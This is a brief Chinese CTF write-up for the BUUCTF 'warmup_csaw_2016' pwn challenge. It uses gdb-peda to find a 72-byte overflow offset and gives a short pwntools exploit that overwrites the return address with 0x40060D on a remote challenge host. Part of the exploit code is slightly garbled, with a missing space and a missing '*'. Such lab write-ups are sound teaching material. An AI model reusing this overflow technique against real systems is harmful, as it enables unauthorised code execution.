buu warmup_csaw_2016

网友投稿 291 2022-10-22


buu warmup_csaw_2016

查看文件类型

file target (已重命名目标文件为target)

64位elf 查看保护机制 checksec target结果为没有开启保护机制 GDB~peda调试 \>gdb target\>start(出现程序运行时的数据)\>pattern_create 300复制粘贴输入后读取rbp中的字符串,复制\>pattern_offset Crtl+shift+v读取为偏移量是64,考虑到Caller's rbp为八个字节,最终payload要用64+8。 payload from pwn importp = remote("ip address",port)payload = 'a'64+'b'*8+p64(0x40060D)p.sendline(payload)p.interactive() Python3 运行 \>python3 exp.py

获得flag。

补充一下

0x40060D是由系统提示获得的关键返回地址。


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

上一篇:教你如何轻松学会Java快慢指针法
下一篇:buuctf rip
相关文章

 发表评论

暂时没有评论,来抢沙发吧~